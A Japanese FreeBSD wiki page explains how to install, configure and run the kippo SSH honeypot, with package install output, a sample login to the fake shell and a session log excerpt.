kippo
提供: FreeBSD入門
スポンサーリンク
kippo とは、対話型 ssh のハニーポッドです。
読み方
- kippo
- きっぽ
概要
kippo は、ssh のハニーポッドです。pkgで入れたkippoの動作が怪しいので、githubからダウンロードしたほうが良さそうです。pkgでインストールすると依存関係がまとめてインストールされるので、pkgで入れた上で、gitコマンドで最新のソースを取ってくるのが良いでしょう。
dl のディレクトリには、wgetコマンドでダウンロードしたファイルが置かれます。kippoを利用して、マルウェアなどの収集が可能です。
インストール
$ sudo pkg install kippo
インストールの例
$ sudo pkg install kippo Updating FreeBSD repository catalogue... Fetching meta.txz: 100% 944 B 0.9kB/s 00:01 Fetching packagesite.txz: 100% 5 MiB 330.3kB/s 00:16 Processing entries: 100% FreeBSD repository update completed. 23798 packages processed. The following 8 package(s) will be affected (of 0 checked): New packages to be INSTALLED: kippo: 0.8 py27-twistedWeb: 15.2.1 py27-twistedCore: 15.2.1 py27-service_identity: 14.0.0 py27-characteristic: 14.1.0 py27-asn1-modules: 0.0.6 py27-zope.interface: 4.1.2 py27-twistedConch: 15.2.1 The process will require 34 MiB more space. 4 MiB to be downloaded. Proceed with this action? [y/N]: y Fetching kippo-0.8.txz: 100% 383 KiB 196.1kB/s 00:02 Fetching py27-twistedWeb-15.2.1.txz: 100% 457 KiB 234.1kB/s 00:02 Fetching py27-twistedCore-15.2.1.txz: 100% 2 MiB 247.8kB/s 00:09 Fetching py27-service_identity-14.0.0.txz: 100% 12 KiB 12.3kB/s 00:01 Fetching py27-characteristic-14.1.0.txz: 100% 19 KiB 19.8kB/s 00:01 Fetching py27-asn1-modules-0.0.6.txz: 100% 49 KiB 50.5kB/s 00:01 Fetching py27-zope.interface-4.1.2.txz: 100% 171 KiB 175.0kB/s 00:01 Fetching py27-twistedConch-15.2.1.txz: 100% 453 KiB 154.6kB/s 00:03 Checking integrity... done (0 conflicting) [1/8] Installing py27-characteristic-14.1.0... [1/8] Extracting py27-characteristic-14.1.0: 100% [2/8] Installing py27-asn1-modules-0.0.6... [2/8] Extracting py27-asn1-modules-0.0.6: 100% [3/8] Installing py27-service_identity-14.0.0... [3/8] Extracting py27-service_identity-14.0.0: 100% [4/8] Installing py27-zope.interface-4.1.2... [4/8] Extracting py27-zope.interface-4.1.2: 100% [5/8] Installing py27-twistedCore-15.2.1... [5/8] Extracting py27-twistedCore-15.2.1: 100% [6/8] Installing py27-twistedWeb-15.2.1... [6/8] Extracting py27-twistedWeb-15.2.1: 100% [7/8] Installing py27-twistedConch-15.2.1... [7/8] Extracting py27-twistedConch-15.2.1: 100% [8/8] Installing kippo-0.8... ===> Creating users and/or groups. Creating group 'kippo' with gid '969'. Creating user 'kippo' with uid '969'. [8/8] Extracting kippo-0.8: 100% Message for kippo-0.8: =UNIQa3607b35465a78cb-h-3--QINU== kippo has been installed in the following directory: /usr/local/share/kippo Before starting kippo you need to perform the following steps: 1) Edit kippo's configuration file to suit your needs: $EDITOR /usr/local/share/kippo/kippo.cfg Please keep in mind when editing the configuration file that kippo can't be run as root and is started by the 'kippo' unprivileged user instead. This implies that the following folders hierarchy must be created and made writable to the 'kippo' user: dl/ data/ log/tty/ 2) Add the following line to your rc.conf: kippo_enable="YES" Note that you can also set the 'kippo_logfile' and 'kippo_pidfile' variables to specify the path to the log file and pid file that will be used by kippo. The default values for those variables are '/tmp/kippo.log' and '/tmp/kippo.pid' respectively. Then you can start kippo by issuing the following command: service kippo start =UNIQa3607b35465a78cb-h-4--QINU==
設定
sudo /usr/bin/ssh-keygen -t rsa -f /usr/local/share/kippo/private.key -N '' sudo mv /usr/local/share/kippo/private.key.pub /usr/local/share/kippo/public.key sudo chown kippo:kippo /usr/local/share/kippo/*.key
cd /usr/local/share/kippo sudo mkdir dl data log sudo chown kippo:kippo dl data log sudo -u mkdir kippo log/tty
起動
起動は、以下の通りです。
sudo service kippo start
停止は、以下の通りです。
sudo service kippo stop
ディレクトリの意味
- dl
- wgetを利用して、ダウンロードされたファイルが保存されます。
- log/kippo.log
- kippoのログファイルです。
- log/tty/
- セッションのログです。
- honeyfs
- 偽のファイルシステムのためのファイル群です。
デフォルトのポート
デフォルトのポートは、2222 です。
使い方
ログインしてみる
$ ssh -l root localhost -p 2222 The authenticity of host '[localhost]:2222 ([127.0.0.1]:2222)' can't be established. RSA key fingerprint is SHA256:ZZZZZZZZZZZZZZZZZZZZ. No matching host key fingerprint found in DNS. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '[localhost]:2222' (RSA) to the list of known hosts. Password: nas3:~# nas3:~# ps -a PID TTY STAT TIME COMMAND 1 ? Ss 0:07 init [2] 2 ? S< 0:00 [kthreadd] 3 ? S< 0:00 [migration/0] 4 ? S< 0:00 [ksoftirqd/0] 5 ? S< 0:00 [watchdog/0] 6 ? S< 0:17 [events/0] 7 ? S< 0:00 [khelper] 39 ? S< 0:00 [kblockd/0] 41 ? S< 0:00 [kacpid] 42 ? S< 0:00 [kacpi_notify] 170 ? S< 0:00 [kseriod] 207 ? S 0:01 [pdflush] 208 ? S 0:00 [pdflush] 209 ? S< 0:00 [kswapd0] 210 ? S< 0:00 [aio/0] 748 ? S< 0:00 [ata/0] 749 ? S< 0:00 [ata_aux] 929 ? S< 0:00 [scsi_eh_0] 1014 ? D< 0:03 [kjournald] 1087 ? S<s 0:00 udevd --daemon 1553 ? S< 0:00 [kpsmoused] 2054 ? Sl 0:01 /usr/sbin/rsyslogd -c3 2103 tty1 Ss 0:00 /bin/login -- 2105 tty2 Ss+ 0:00 /sbin/getty 38400 tty2 2107 tty3 Ss+ 0:00 /sbin/getty 38400 tty3 2109 tty4 Ss+ 0:00 /sbin/getty 38400 tty4 2110 tty5 Ss+ 0:00 /sbin/getty 38400 tty5 2112 tty6 Ss+ 0:00 /sbin/getty 38400 tty6 2133 ? S<s 0:00 dhclient3 -pf /var/run/dhclient.eth0.pid -lf /var/lib 4969 ? Ss 0:00 /usr/sbin/sshd: root@pts/0 5673 pts/0 Ss 0:00 -bash 5679 pts/0 R+ 0:00 ps -a nas3:~# ifconfig eth0 Link encap:Ethernet HWaddr 00:4c:a8:ab:32:f4 inet addr:10.98.55.4 Bcast:10.98.55.255 Mask:255.255.255.0 inet6 addr: fe80::21f:c6ac:fd44:24d7/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:84045991 errors:0 dropped:0 overruns:0 frame:0 TX packets:103776307 errors:0 dropped:0 overruns:0 carrier:2 collisions:0 txqueuelen:1000 RX bytes:50588302699 (47.1 GiB) TX bytes:97318807157 (90.6 GiB) lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:308297 errors:0 dropped:0 overruns:0 frame:0 TX packets:308297 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:355278106 (338.8 MiB) TX bytes:355278106 (338.8 MiB)
ログ
$ tail -f /tmp/kippo.log 2015-07-09 02:14:08+0900 [-] New connection: 127.0.0.1:41836 (127.0.0.1:2222) [session: 0] 2015-07-09 02:14:08+0900 [-] Remote SSH version: SSH-2.0-OpenSSH_6.8-hpn14v5 2015-07-09 02:14:08+0900 [HoneyPotTransport,0,127.0.0.1] kex alg, key alg: diffie-hellman-group1-sha1 ssh-rsa 2015-07-09 02:14:08+0900 [HoneyPotTransport,0,127.0.0.1] outgoing: aes128-ctr hmac-sha1 none 2015-07-09 02:14:08+0900 [HoneyPotTransport,0,127.0.0.1] incoming: aes128-ctr hmac-sha1 none 2015-07-09 02:14:11+0900 [HoneyPotTransport,0,127.0.0.1] NEW KEYS 2015-07-09 02:14:11+0900 [HoneyPotTransport,0,127.0.0.1] starting service ssh-userauth 2015-07-09 02:14:11+0900 [SSHService ssh-userauth on HoneyPotTransport,0,127.0.0.1] root trying auth none 2015-07-09 02:14:11+0900 [SSHService ssh-userauth on HoneyPotTransport,0,127.0.0.1] root trying auth keyboard-interactive 2015-07-09 02:14:15+0900 [-] login attempt [root/123456] succeeded 2015-07-09 02:14:15+0900 [SSHService ssh-userauth on HoneyPotTransport,0,127.0.0.1] root authenticated with keyboard-interactive 2015-07-09 02:14:15+0900 [SSHService ssh-userauth on HoneyPotTransport,0,127.0.0.1] starting service ssh-connection 2015-07-09 02:14:15+0900 [SSHService ssh-connection on HoneyPotTransport,0,127.0.0.1] got channel session request 2015-07-09 02:14:15+0900 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,127.0.0.1] channel open 2015-07-09 02:14:15+0900 [SSHService ssh-connection on HoneyPotTransport,0,127.0.0.1] got global no-more-sessions@openssh.com request 2015-07-09 02:14:15+0900 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,127.0.0.1] pty request: xterm-256color (71, 80, 0, 0) 2015-07-09 02:14:15+0900 [-] Terminal size: 71 80 2015-07-09 02:14:15+0900 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,127.0.0.1] getting shell 2015-07-09 02:14:15+0900 [-] Opening TTY log: log/tty/20150709-021415-8938.log 2015-07-09 02:14:17+0900 [-] /etc/motd resolved into /etc/motd 2015-07-09 02:15:34+0900 [-] CMD: ls 2015-07-09 02:15:34+0900 [-] Command found: ls 2015-07-09 02:15:38+0900 [-] CMD: ls /bin 2015-07-09 02:15:38+0900 [-] Command found: ls /bin 2015-07-09 02:15:47+0900 [-] CMD: ps 2015-07-09 02:15:47+0900 [-] Command found: ps 2015-07-09 02:15:50+0900 [-] CMD: ps -a 2015-07-09 02:15:50+0900 [-] Command found: ps -a 2015-07-09 02:15:59+0900 [-] CMD: ifconfig 2015-07-09 02:15:59+0900 [-] Command found: ifconfig 2015-07-09 02:15:59+0900 [-] Reading txtcmd from "/usr/local/share/kippo/txtcmds/sbin/ifconfig"
関連項目
ツイート
スポンサーリンク